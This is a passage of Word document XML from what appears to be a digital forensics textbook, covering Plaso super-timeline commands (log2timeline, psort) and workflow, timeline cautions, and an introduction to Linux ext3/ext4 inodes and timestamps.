        <w:t xml:space="preserve"> combines file-system timestamps, registry key times, event logs, browser history, prefetch and more into one big list. This helps the investigator see patterns that are invisible when looking at each source alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Plaso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a free tool set for building super timelines. Its main parts are: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log2timeline.py</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Reads an image or folder and extracts events from many artefact types into a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.plaso</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> storage file</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pinfo.py</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information and statistics about a .plaso file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psort.py</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Sorts, filters (by date range, keywords) and exports events to CSV or other formats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Timesketch</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Web tool for collaborative timeline analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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rPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">log2timeline.py --storage-file case01.plaso suspect.E01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">psort.py -o l2tcsv -w timeline.csv case01.plaso "date &gt; '2024-03-05 22:00:00' AND date &lt; '2024-03-06 02:00:00'"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decide the time window and the main questions (for example, what happened between 23:00 and 00:30?).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run log2timeline on the verified image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use psort to filter to the time window and export to CSV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the events around the key time, look for clusters of activity, and pivot on important items (a user name, file name, USB serial).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify important events with the original artefact and with a second source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Convert all times to one time zone (usually UTC) before reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Timeline cautions</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Always check the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">time zone</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clock accuracy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> of each source. A computer’s clock may be wrong, and different artefacts use different time formats (FILETIME, WebKit, Unix). A timeline shows events that </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">happened close together</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, not automatically that one caused the other.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 Linux Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux has no registry. Instead it keeps information in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plain text configuration files, logs, and hidden files in home directories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because there is no single central place, investigators need to know the standard locations well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ext3 / ext4 file system overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ext3</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ext4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the common Linux file systems. ext3 added </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">journaling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ext2, which reduces corruption after crashes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ext4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> improves ext3 with larger volumes and files, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (efficient mapping of data), faster checks and — importantly for forensics — a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">creation time (crtime)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every file or directory is described by an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a data structure that stores the file’s metadata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File type and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">permissions</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owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UID) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GID).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">location of data blocks</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Timestamps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">atime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (last access), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (last content modification), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ctime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (last </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inode/metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> change — not creation!) and, in ext4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">crtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (creation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The inode does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> store the file name. Names are stored in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">directory entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which maps a name to an inode number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Commonly confused</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ctime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> in Linux means </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">change time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the inode (permissions, owner, rename, content change), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> “creation time” as many people assume. Creation time exists only as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">crtime/birth time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> in ext4, viewed with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
